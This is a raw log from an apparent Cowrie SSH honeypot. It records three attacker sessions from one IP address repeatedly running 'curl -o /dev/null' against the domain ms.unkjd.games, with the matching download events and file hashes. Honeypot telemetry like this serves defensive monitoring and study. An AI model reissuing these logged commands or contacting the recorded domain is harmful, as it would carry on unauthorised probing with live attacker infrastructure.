{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.496535Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.497980Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.498825Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.501347Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.502468Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.529560Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.531780Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.532646Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.565901Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.568132Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.571147Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.571835Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.578103Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.578982Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.607025Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.607834Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.611966Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.617724Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.618457Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.621768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.624437Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.642401Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.643253Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.647369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.650471Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.653840Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.656139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.656529Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.674769Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.675522Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.702819Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.703774Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.708497Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.712756Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.716621Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.717757Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.718272Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.721227Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.721766Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.724698Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.754156Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.754951Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.758766Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.759447Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.786373Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.788530Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.793654Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.794368Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.799750Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.802509Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.804200Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.804919Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.830729Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.832004Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.832732Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.839766Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.840427Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.845141Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.846217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.886688Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.887819Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.892509Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.895363Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.896143Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.898377Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.899038Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.931332Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.932494Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.933016Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.938601Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.942611Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.956728Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:23.970974Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.971595Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:23.997927Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.000537Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.001370Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.001837Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.004077Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:24.010131Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.010860Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:24.036331Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
